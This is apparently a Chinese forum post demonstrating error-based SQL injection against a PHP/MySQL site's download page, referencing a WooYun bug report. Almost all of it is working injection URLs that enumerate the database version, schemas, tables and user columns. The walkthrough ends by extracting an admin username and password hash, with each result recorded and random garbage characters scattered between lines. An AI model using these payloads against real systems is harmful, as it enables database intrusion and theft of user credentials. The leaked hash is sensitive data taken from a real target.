php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

# l/ L$ f9 M% a' {2 ~" l8 F3 Q. F之前想找个测试 没想到这有 可以测试下做个记录而已
. P( X+ l1 _! f! ?
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

( S. ]( O% r. T/ X; c/data0/htdocs/leqi_new/app/myapp.php
9 ~: U) P, h+ r. e1 n+ Q
或者

; M+ v% C3 e% K3 s5 W: k+ ]+ j# |/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
% D" u4 ]% r/ }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: p& o7 B# N* @
/**********database()**********/  leqi
  z: F" j! j  [" g& g3 X& \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 Q+ ]' W" L& q% Y. W% u! l
/**********limit依次递归爆库**********/
) q; e! V3 f7 L6 Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
. P3 U1 t6 k' r2 u& fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
/ C: ~/ [2 ?4 j7 D# uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% K: y$ @( r! Z# g. X8 g' Vusers

/**********limit依次递归爆字段名**********/
/ L# ^. }8 O# X- A2 Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ X6 ~/ n  q  k* }7 o% s& }0 w/wapc/5000_0005_003
' H1 Q0 y4 c' h" a7 q7 l! G11 21
, C% a" d* l0 v2 p# M1 ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
8 d) t* e4 Z( y$ P, n11 341 351 361
/**********爆数据**********/
4 Q, J( M4 V7 ]+ x8 Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, O; y1 y! y! i) S) g) Fadmin
1 X$ Z% `6 G& m* D( Q( L1 Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% r/ d! b+ c, o! k8 b6a8b4574ca231eb8bd52764d4978ffcd

2 G# `) `# w1 Y- }* M2 }) z